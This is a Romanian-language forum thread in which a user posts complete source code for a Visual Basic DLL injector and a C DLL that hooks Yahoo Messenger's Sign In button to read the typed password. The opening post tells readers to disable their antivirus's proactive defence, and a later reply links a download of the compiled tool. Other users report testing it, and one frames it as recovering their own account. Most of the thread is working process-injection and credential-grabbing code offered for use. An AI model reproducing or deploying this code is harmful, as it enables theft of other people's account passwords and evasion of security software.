vladiii Posted January 4, 2008 Report Posted January 4, 2008 Am facut un mic programel care injecteaza un DLL in Yahoo Messenger. Practic, eu interceptez mesajele trimise de windows catre butonul Sign In... Cand primesc un mesaj WM_COMMAND (cu BN_CLICKED) atunci preiau parola din fieldul Password si o afisez intr-un messagebox. Injecterul este facut in VB, iar DLLul in C [asta pt. ca VB sux si nu am reusit sa scriu un DLL care sa execute ceva cand il injectez in procesul YahooMessenger]. Am sa prezint aici codurile sursa. [injecterul in VB este ca orice alt DLL injecter si nu are nimic deosebit... Ideea e ca pe net eu nu am gasit DLL injecter scris in VB, asa ca l-am scris eu (evident, cu ajutor de la injecterele scrise in alte limbaje de programare)]. In acest injecter am lasat si anumite MsgBox'uri care afiseaza valoarea handleurilor. Daca vreun handle este 0, atunci mai dati o data inject (este posibil sa nu injecteze DLL'ul din prima incercare). Pe langa asta e posibil ca AV'ul sa va atentioneze, dar nu-i nicio problema, dezactivati Proactive Defense (la Kasperky...). Sa vedem codul de la injecter (in modul):Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPublic Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As LongPublic Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPublic Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As LongPublic Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As LongPublic Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As LongPublic Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As LongPublic Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As LongPublic Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As LongPublic Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As LongPublic Declare Function IsWindow Lib "user32" (ByVal hwnd As Long) As LongPublic Const PAGE_READWRITE As Long = &H4Public Const MEM_COMMIT As Long = &H1000Public Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000Public Const SYNCHRONIZE As Long = &H100000Public Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)Public Const INFINITE As Long = &HFFFFFFPublic Sub injectdll(ByVal procid As Long, ByVal inject As String)Dim hProcess As LongDim lpRemoteAddress As LongDim inj As LongDim k32 As LongDim dwtid As LongDim asd As LonghProcess = OpenProcess(PROCESS_ALL_ACCESS, False, procid)If (hProcess = 0) Then MsgBox "A aparut o eroare!"End Ifasd = GetModuleHandle("kernel32.dll")k32 = GetProcAddress(asd, "LoadLibraryA")lpRemoteAddress = VirtualAllocEx(hProcess, 0, Len(inject), MEM_COMMIT, PAGE_READWRITE)MsgBox lpRemoteAddressinj = WriteProcessMemory(hProcess, ByVal lpRemoteAddress, ByVal inject, LenB(inject), dwBytesWritten)MsgBox injIf (inj <> 0) Then hRemoteThread = CreateRemoteThread(hProcess, 0, 0, ByVal k32, ByVal lpRemoteAddress, 0, dwtid) MsgBox hRemoteThreadEnd IfWaitForSingleObject hRemoteThread, INFINITECloseHandle hProcessCloseHandle hRemoteThreadEnd SubSi pe un buton din interiorul formului:Private Sub Command1_Click()Dim pid As LongDim handle As Longhandle = FindWindow("YahooBuddyMain", vbNullString)'Gasim PIDul procesuluiCall GetWindowThreadProcessId(handle, pid)'Apelam functia care injecteaza DLLulCall injectdll(pid, "C:\Project1.dll")End SubSi acum DLL'ul scris in C si compilat in Dev-C++ [evident, este un proiect de tip DLL]. Eu am scris codul in dllmain.c, iar Dev mi-a creat un fisier, dll.h ! Sa vedem codul:/* Replace "dll.h" with the name of your header */#include "dll.h"#include <windows.h>#include <stdio.h>#include <stdlib.h>DWORD WINAPI Main();LRESULT CALLBACK NewWndProc(HWND,UINT,WPARAM,LPARAM);LONG OldWndProc; // procedura de fereastra YahooMessenger BOOL APIENTRY DllMain (HINSTANCE hInst /* Library instance handle. */ , DWORD reason /* Reason this function is being called. */ , LPVOID reserved /* Not used. */ ){ switch (reason) { case DLL_PROCESS_ATTACH: //Cream un nou thread in care o sa executam codul nostru CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)&Main,NULL,0,NULL); case DLL_PROCESS_DETACH: break; case DLL_THREAD_ATTACH: break; case DLL_THREAD_DETACH: break; } /* Returns TRUE on success, FALSE on failure */ return TRUE;}DWORD WINAPI Main(){ HWND hand1=FindWindow("YahooBuddyMain", NULL); HWND hand2=FindWindowEx(hand1, 0, "#32770", NULL); //Butonul Sign In este un copil al ferstrei cu handleul hand2 OldWndProc=SetWindowLong(hand2,GWL_WNDPROC,(long)NewWndProc); ExitThread(0);}LRESULT CALLBACK NewWndProc(HWND hWnd,UINT Message,WPARAM wParam,LPARAM lParam){ switch(Message) { case WM_COMMAND: { //Daca butonul Sign In este "apasat" atunci... if(HIWORD(wParam)==BN_CLICKED && LOWORD(wParam)==1) { LPARAM pass; long len; HWND hwnd=FindWindow("YahooBuddyMain",0); hwnd=FindWindowEx(hwnd, 0, "#32770", NULL); HWND hwnd2=FindWindowEx(hwnd, 0, "Edit", NULL); hwnd=FindWindowEx(hwnd, hwnd2, "Edit", NULL); len=SendMessage(hwnd, WM_GETTEXTLENGTH,0,0); len+=1; pass=(LPARAM)malloc(len); SendMessage(hwnd, WM_GETTEXT, len, pass); //Afisam MessageBox (0, (char*)pass, (char*)pass, 0); } } }// Trimitem mesajele unde trebuiau sa ajunga ele de fapt return CallWindowProc((WNDPROC)OldWndProc,hWnd,Message,wParam,lParam); }Cam atat. Sper ca va fi util cuiva/candva !P.S. Multumiri lui SlicK pt. tot ajutorul acordat [you're the man]. Quote
kw3rln Posted January 5, 2008 Report Posted January 5, 2008 bravo !http://rstcenter.com/index.php?pagina=tutoriale&selecteaza=tutorial&id=60 Quote
EsKaBaR Posted February 1, 2008 Report Posted February 1, 2008 ehh mi-ar fi de ajutor dll-ul ... ... http://rstcenter.com/forum/am-uitat-parola-la-id-personal-pe-care-sunt-logat-si-acum-t9954.rstnu stiu ce sa fac sa o recuperez.... nu vreau sa ma despart de id-ul asta ... si sa fac altul ... sunt online ca am lasat remember id and password dar daca mi se strica windows... m-am dus draq ... va rog ajutati-ma si pe mine ... raman dator vladiii ma poti ajuta? ofera-mi si mie support pe mess ca nu ma pricep ..... ... chiar as fi recunoscator... Quote
vladiii Posted February 2, 2008 Author Report Posted February 2, 2008 ^ Am uploadat aici si injecterul si DLLul:[url]http://rapidshare.com/files/88602000/RetriveY_Pass.rar.html[/url]Salvezi Project1.dll in C:\, te deloghezi de pe messenger, rulezi injecter.exe apoi dai Sign In si va afisa un msgbox cu parola. Insa, daca parola ta avea mai mult de 8 caractere, in campul acela se va afla: "password". In cazul acesta nu mai ai ce face, deoarece algoritmul de decriptare al parolei nu este cunoscut.Succes ! Quote
shamat Posted February 2, 2008 Report Posted February 2, 2008 Am incercat programul pe un cont cu parola 123456.Mie imi apar 3 MsgBox-uri. Primul cu un nr de 8 cifre (nu parola mea), al doilea afiseaza nr 1, iar al treilea 92 sau 88. Quote
vladiii Posted February 2, 2008 Author Report Posted February 2, 2008 Te-ai uitat pe codul sursa ? Se pare ca NU !1) Acele 3 MsgBoxuri au rolul de a confirma ca DLLul a fost injectat. Daca valorea din vreun MsgBox este 0, atunci DLLul nu a fost injectat si mai trebuie apasat o data pe Inject.2) MessageBoxul cu parola ta va fi afisat atunci cand dai click pe Sign In. Deoarece eu subclasez acest buton. Quote
shamat Posted February 2, 2008 Report Posted February 2, 2008 Acum am reusit. Programul functioneaza bine. Ziceai ca daca parola mea are mai mult de 8 caractere in campul parolei se va aflat cuvantul "Password". Chiar daca parola ta e mai scurta de 8 caractere campul acela tot cuvantul "Password" il va contine. Eu cand injectez si dau sign in imi va arata "Password" si nu parola mea. Corecteaza-ma daca am gresit. Quote
vladiii Posted February 2, 2008 Author Report Posted February 2, 2008 Nu ai gresit. Am testat acum 5 minute si indiferent ce parola ai pune, daca dai Remember ID & Password acolo tot password ramane. Quote